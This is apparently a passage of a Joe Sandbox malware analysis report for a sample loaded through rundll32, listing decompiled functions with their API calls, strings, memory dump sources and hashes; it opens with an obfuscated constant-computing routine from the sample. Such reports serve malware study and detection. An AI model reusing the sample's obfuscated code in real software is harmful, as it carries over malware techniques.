                                                                                                                      			E001768DE(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				void* _t87;
				signed int _t99;
				signed int _t100;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E0017CF25(_t87);
				_v8 = 0x73b8de;
				_v8 = _v8 ^ 0x19054fb7;
				_v8 = _v8 << 0xd;
				_v8 = _v8 + 0x3490;
				_v8 = _v8 ^ 0xdee55d26;
				_v20 = 0xe646cf;
				_v20 = _v20 >> 0xb;
				_v20 = _v20 ^ 0x0000515e;
				_v16 = 0xc8864d;
				_v16 = _v16 >> 7;
				_v16 = _v16 + 0xffff7ea5;
				_v16 = _v16 >> 1;
				_v16 = _v16 ^ 0x000d0f10;
				_v16 = 0xf76b6b;
				_v16 = _v16 + 0xffff8d96;
				_v16 = _v16 + 0xa530;
				_v16 = _v16 ^ 0x00f3b26e;
				_v28 = 0xad3635;
				_v28 = _v28 << 4;
				_v28 = _v28 ^ 0x0ad12e90;
				_v28 = 0xa7b230;
				_t99 = 0x21;
				_v28 = _v28 * 0x16;
				_v28 = _v28 ^ 0x0e6a6f58;
				_v28 = 0xa141da;
				_v28 = _v28 / _t99;
				_v28 = _v28 ^ 0x0004c009;
				_v16 = 0x3b52c9;
				_t100 = 0x69;
				_v16 = _v16 / _t100;
				_v16 = _v16 | 0xd3b68a53;
				_v16 = _v16 + 0xffff1b94;
				_v16 = _v16 ^ 0xd3beae71;
				_v12 = 0xce562d;
				_v12 = _v12 << 0x10;
				_v12 = _v12 << 0x10;
				_v12 = _v12 + 0xffff0c4b;
				_v12 = _v12 ^ 0xfffd1cdf;
				_v24 = 0x109fa9;
				_v24 = _v24 >> 8;
				_v24 = _v24 ^ 0x0002830d;
				return E001840F4(_v28, _v16, _a12, _v12, _v24, E00185BB3());
			}












                                                                                                                      0x001768e4
                                                                                                                      0x001768e7
                                                                                                                      0x001768ea
                                                                                                                      0x001768ed
                                                                                                                      0x001768ef
                                                                                                                      0x001768f4
                                                                                                                      0x001768fd
                                                                                                                      0x00176904
                                                                                                                      0x00176908
                                                                                                                      0x0017690f
                                                                                                                      0x00176916
                                                                                                                      0x0017691d
                                                                                                                      0x00176921
                                                                                                                      0x00176928
                                                                                                                      0x0017692f
                                                                                                                      0x00176933
                                                                                                                      0x0017693a
                                                                                                                      0x0017693d
                                                                                                                      0x00176944
                                                                                                                      0x0017694b
                                                                                                                      0x00176952
                                                                                                                      0x00176959
                                                                                                                      0x00176960
                                                                                                                      0x00176967
                                                                                                                      0x0017696b
                                                                                                                      0x00176972
                                                                                                                      0x0017697f
                                                                                                                      0x00176982
                                                                                                                      0x00176985
                                                                                                                      0x0017698c
                                                                                                                      0x0017699a
                                                                                                                      0x0017699d
                                                                                                                      0x001769a4
                                                                                                                      0x001769ae
                                                                                                                      0x001769b1
                                                                                                                      0x001769b4
                                                                                                                      0x001769bb
                                                                                                                      0x001769c2
                                                                                                                      0x001769c9
                                                                                                                      0x001769d0
                                                                                                                      0x001769d4
                                                                                                                      0x001769d8
                                                                                                                      0x001769df
                                                                                                                      0x001769e6
                                                                                                                      0x001769ed
                                                                                                                      0x001769f1
                                                                                                                      0x00176a1e

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: d2a8de53734b9d3901bc94b6b25c32e81bc309cda1bfd67e32ed41b72a8c3f3f
                                                                                                                      • Instruction ID: 4fbffea0d203ecc346c5694321e2be9f4c8cf795866d52f83ef7eaf1a90515bd
                                                                                                                      • Opcode Fuzzy Hash: d2a8de53734b9d3901bc94b6b25c32e81bc309cda1bfd67e32ed41b72a8c3f3f
                                                                                                                      • Instruction Fuzzy Hash: 0A31B0B6C0160EEBDF45DFA5D84A4EEBBB2AB10308F208599E611A6251D3B55B548F80
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0018D374 Relevance: .0, Instructions: 2COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E0018D374() {

				return  *[fs:0x30];
			}



                                                                                                                      0x0018d37a

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                      • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                                                                      • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10014DA8 Relevance: 45.7, APIs: 21, Strings: 5, Instructions: 229registrylibraryloaderCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 10014DC7
                                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 10014DE8
                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10014DF9
                                                                                                                      • ConvertDefaultLocale.KERNEL32(?), ref: 10014E2F
                                                                                                                      • ConvertDefaultLocale.KERNEL32(?), ref: 10014E37
                                                                                                                      • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10014E4B
                                                                                                                      • ConvertDefaultLocale.KERNEL32(?), ref: 10014E6F
                                                                                                                      • ConvertDefaultLocale.KERNEL32(000003FF), ref: 10014E75
                                                                                                                      • GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10014EAE
                                                                                                                      • GetVersion.KERNEL32 ref: 10014EC3
                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 10014EE8
                                                                                                                      • RegQueryValueExA.ADVAPI32 ref: 10014F0D
                                                                                                                      • _sscanf.LIBCMT ref: 10014F2D
                                                                                                                      • ConvertDefaultLocale.KERNEL32(?), ref: 10014F62
                                                                                                                      • ConvertDefaultLocale.KERNEL32(7322FFF6), ref: 10014F68
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 10014F77
                                                                                                                      • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 10014F87
                                                                                                                      • EnumResourceLanguagesA.KERNEL32(00000000,00000010,00000001,10014522,?), ref: 10014FA2
                                                                                                                      • ConvertDefaultLocale.KERNEL32(?), ref: 10014FD3
                                                                                                                      • ConvertDefaultLocale.KERNEL32(7322FFF6), ref: 10014FD9
                                                                                                                      • _memset.LIBCMT ref: 10014FF3
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ConvertDefaultLocale$Module$AddressHandleProc$CloseEnumFileH_prolog3LanguagesNameOpenQueryResourceValueVersion_memset_sscanf
                                                                                                                      • String ID: Control Panel\Desktop\ResourceLocale$GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                                                                                                                      • API String ID: 434808117-483790700
                                                                                                                      • Opcode ID: 147489415d7f7f12e4b820da42085f8fd97c08a4daccd4d9168a1bbabc89fc72
                                                                                                                      • Instruction ID: f69531b56b144151f4c46f4c2f1acf85afd3bdedcb4b37807a4dae52f16cbedc
                                                                                                                      • Opcode Fuzzy Hash: 147489415d7f7f12e4b820da42085f8fd97c08a4daccd4d9168a1bbabc89fc72
                                                                                                                      • Instruction Fuzzy Hash: AD817171D002699FDB10DFA5DD44AFEBBF9FB48341F11012AE944E7290DB789A41CB60
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002E129 Relevance: 42.0, APIs: 12, Strings: 12, Instructions: 44registryclipboardCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • RegisterClipboardFormatA.USER32(Native), ref: 1002E138
                                                                                                                      • RegisterClipboardFormatA.USER32(OwnerLink), ref: 1002E141
                                                                                                                      • RegisterClipboardFormatA.USER32(ObjectLink), ref: 1002E14B
                                                                                                                      • RegisterClipboardFormatA.USER32(Embedded Object), ref: 1002E155
                                                                                                                      • RegisterClipboardFormatA.USER32(Embed Source), ref: 1002E15F
                                                                                                                      • RegisterClipboardFormatA.USER32(Link Source), ref: 1002E169
                                                                                                                      • RegisterClipboardFormatA.USER32(Object Descriptor), ref: 1002E173
                                                                                                                      • RegisterClipboardFormatA.USER32(Link Source Descriptor), ref: 1002E17D
                                                                                                                      • RegisterClipboardFormatA.USER32(FileName), ref: 1002E187
                                                                                                                      • RegisterClipboardFormatA.USER32(FileNameW), ref: 1002E191
                                                                                                                      • RegisterClipboardFormatA.USER32(Rich Text Format), ref: 1002E19B
                                                                                                                      • RegisterClipboardFormatA.USER32(RichEdit Text and Objects), ref: 1002E1A5
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ClipboardFormatRegister
                                                                                                                      • String ID: Embed Source$Embedded Object$FileName$FileNameW$Link Source$Link Source Descriptor$Native$Object Descriptor$ObjectLink$OwnerLink$Rich Text Format$RichEdit Text and Objects
                                                                                                                      • API String ID: 1228543026-2889995556
                                                                                                                      • Opcode ID: 59400726b86d90ec70e7cae638daa4a7ba4f983a7778b7d8b23ac204cd440048
                                                                                                                      • Instruction ID: dd0e5b84f65b6698509d1545b20fc89df91f0ad9f4cec7ea2b0b947e93895074
                                                                                                                      • Opcode Fuzzy Hash: 59400726b86d90ec70e7cae638daa4a7ba4f983a7778b7d8b23ac204cd440048
                                                                                                                      • Instruction Fuzzy Hash: 11013271800784AACB30EFB69C48C8BBAE4EEC5611322493EE295C7651E774D142CF88
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1003548E Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,10030AF9,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 10035494
                                                                                                                      • __mtterm.LIBCMT ref: 100354A0
                                                                                                                        • Part of subcall function 10035178: __decode_pointer.LIBCMT ref: 10035189
                                                                                                                        • Part of subcall function 10035178: TlsFree.KERNEL32(0000001E,10030B95,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100351A3
                                                                                                                        • Part of subcall function 10035178: DeleteCriticalSection.KERNEL32(00000000,00000000,?,00000001,10030B95,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C), ref: 10035987
                                                                                                                        • Part of subcall function 10035178: DeleteCriticalSection.KERNEL32(0000001E,?,00000001,10030B95,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23), ref: 100359B1
                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsAlloc,00000000,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354B6
                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsGetValue,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354C3
                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsSetValue,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354D0
                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsFree,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354DD
                                                                                                                      • TlsAlloc.KERNEL32(?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 1003552D
                                                                                                                      • TlsSetValue.KERNEL32(00000000,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 10035548
                                                                                                                      • __init_pointers.LIBCMT ref: 10035552
                                                                                                                      • __encode_pointer.LIBCMT ref: 1003555D
                                                                                                                      • __encode_pointer.LIBCMT ref: 1003556D
                                                                                                                      • __encode_pointer.LIBCMT ref: 1003557D
                                                                                                                      • __encode_pointer.LIBCMT ref: 1003558D
                                                                                                                      • __decode_pointer.LIBCMT ref: 100355AE
                                                                                                                      • __calloc_crt.LIBCMT ref: 100355C7
                                                                                                                      • __decode_pointer.LIBCMT ref: 100355E1
                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 100355F7
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressProc__encode_pointer$__decode_pointer$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm
                                                                                                                      • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                      • API String ID: 4287529916-3819984048
                                                                                                                      • Opcode ID: 7b999aff3b121b0dd31d802fbd5a53390c05e299083a78b6c63fb44fd02a4d79
                                                                                                                      • Instruction ID: 5f0ed48c763fc33488bdc3e5787629902cd989e4a3f8a0ff7b7d748a1094bf66
                                                                                                                      • Opcode Fuzzy Hash: 7b999aff3b121b0dd31d802fbd5a53390c05e299083a78b6c63fb44fd02a4d79
                                                                                                                      • Instruction Fuzzy Hash: 0131A0709067219EEB12DF74ADC5A593AE1FB45363F21092AE414CB1F0EB3694409FA0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1001C915 Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 179COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 1001C91F
                                                                                                                        • Part of subcall function 10020C26: __EH_prolog3.LIBCMT ref: 10020C2D
                                                                                                                      • CallNextHookEx.USER32 ref: 1001C963
                                                                                                                        • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                      • GetClassLongA.USER32(?,000000E6), ref: 1001C9A7
                                                                                                                      • GlobalGetAtomNameA.KERNEL32 ref: 1001C9D1
                                                                                                                      • SetWindowLongA.USER32 ref: 1001CA26
                                                                                                                      • _memset.LIBCMT ref: 1001CA70
                                                                                                                      • GetClassLongA.USER32(?,000000E0), ref: 1001CAA0
                                                                                                                      • GetClassNameA.USER32(?,?,00000100), ref: 1001CAC1
                                                                                                                      • GetWindowLongA.USER32(?,000000FC), ref: 1001CAE5
                                                                                                                      • GetPropA.USER32(?,AfxOldWndProc423), ref: 1001CAFF
                                                                                                                      • SetPropA.USER32(?,AfxOldWndProc423,?), ref: 1001CB0A
                                                                                                                      • GetPropA.USER32(?,AfxOldWndProc423), ref: 1001CB12
                                                                                                                      • GlobalAddAtomA.KERNEL32(AfxOldWndProc423), ref: 1001CB1A
                                                                                                                      • SetWindowLongA.USER32 ref: 1001CB28
                                                                                                                      • CallNextHookEx.USER32 ref: 1001CB40
                                                                                                                      • UnhookWindowsHookEx.USER32 ref: 1001CB54
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Long$ClassHookPropWindow$AtomCallGlobalNameNext$Exception@8H_prolog3H_prolog3_ThrowUnhookWindows_memset
                                                                                                                      • String ID: #32768$AfxOldWndProc423$ime
                                                                                                                      • API String ID: 867647115-4034971020
                                                                                                                      • Opcode ID: be0f4bdd952448ef7690da40483777f37b87bc3c1912211ef9ad5859523c10f5
                                                                                                                      • Instruction ID: e0f5ce7512a5b4d1e32b812d2adba45b1a1350b75cf904612dadc9a2b629d5df
                                                                                                                      • Opcode Fuzzy Hash: be0f4bdd952448ef7690da40483777f37b87bc3c1912211ef9ad5859523c10f5
                                                                                                                      • Instruction Fuzzy Hash: A561EF7540426EAFDB11DF61CD89FAE3BB8EF09362F100154F509EA191DB34EA80CBA5
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002DB49 Relevance: 28.9, APIs: 19, Instructions: 423stringCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: String$Variant$ClearFree_memset$ChangeException@8H_prolog3ThrowTypelstrlen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4128688680-0
                                                                                                                      • Opcode ID: 6192f18373e1637f38ae635fdb485c2c49157f7b8aa44aff1f0335ddf822a966
                                                                                                                      • Instruction ID: 42fa242583032f4c72b1ee8c19c4a820194bcb4b4a787a5525753aa98076571e
                                                                                                                      • Opcode Fuzzy Hash: 6192f18373e1637f38ae635fdb485c2c49157f7b8aa44aff1f0335ddf822a966
                                                                                                                      • Instruction Fuzzy Hash: 5EF18A7490025ADFDF11DFA8D880AEEBBB4FF05300F90406AE951AB2A1D774AE56CF50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10018B59 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 77libraryloaderCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,754A7F34,10018CA5,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018B82
                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetSystemMetrics,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018B9E
                                                                                                                      • GetProcAddress.KERNEL32(00000000,MonitorFromWindow,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BAF
                                                                                                                      • GetProcAddress.KERNEL32(00000000,MonitorFromRect,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BC0
                                                                                                                      • GetProcAddress.KERNEL32(00000000,MonitorFromPoint,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BD1
                                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BE2
                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BF3
                                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018C04
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressProc$HandleModule
                                                                                                                      • String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                                                                                                                      • API String ID: 667068680-68207542
                                                                                                                      • Opcode ID: ef20b1205fbe14ac9d2a40522549883dc0a7ccf4399eb4921ca3be0b95f38340
                                                                                                                      • Instruction ID: 77f58ff47d83721d02e0aa712f7cb6554a3c60b1de10c844b6b889dbd48dd915
                                                                                                                      • Opcode Fuzzy Hash: ef20b1205fbe14ac9d2a40522549883dc0a7ccf4399eb4921ca3be0b95f38340
                                                                                                                      • Instruction Fuzzy Hash: 40213071902121AAE751DF25ADC046DBAEAF349280F61093FF10CD6560D7309AC6AFA9
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002A778 Relevance: 26.0, APIs: 17, Instructions: 452windowkeyboardCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Focus$Window$MessageParentState$BeepDialogEnabledH_prolog3_catch
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 656273425-0
                                                                                                                      • Opcode ID: c00fbb9f62a63b0a8ab12a0078c89d294cc621361981fd48dcea0cc4144d3722
                                                                                                                      • Instruction ID: ae1ce06b8cbd239f24ee816c06620fe7a5750cbf7a5142a39db81a57ec361da3
                                                                                                                      • Opcode Fuzzy Hash: c00fbb9f62a63b0a8ab12a0078c89d294cc621361981fd48dcea0cc4144d3722
                                                                                                                      • Instruction Fuzzy Hash: ECF1BC35E00206ABDF11EF61E984AAE7BF5EF46790F924029E845AB161DF34ECC0DB51
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1001AA48 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 176windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 1001DDC0: GetWindowLongA.USER32(?,000000F0), ref: 1001DDCB
                                                                                                                      • GetParent.USER32(?), ref: 1001AA75
                                                                                                                      • SendMessageA.USER32 ref: 1001AA98
                                                                                                                      • GetWindowRect.USER32 ref: 1001AAB2
                                                                                                                      • GetWindowLongA.USER32(00000000,000000F0), ref: 1001AAC8
                                                                                                                      • CopyRect.USER32(?,?), ref: 1001AB15
                                                                                                                      • CopyRect.USER32(?,?), ref: 1001AB1F
                                                                                                                      • GetWindowRect.USER32 ref: 1001AB28
                                                                                                                      • CopyRect.USER32(?,?), ref: 1001AB44
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Rect$Window$Copy$Long$MessageParentSend
                                                                                                                      • String ID: (
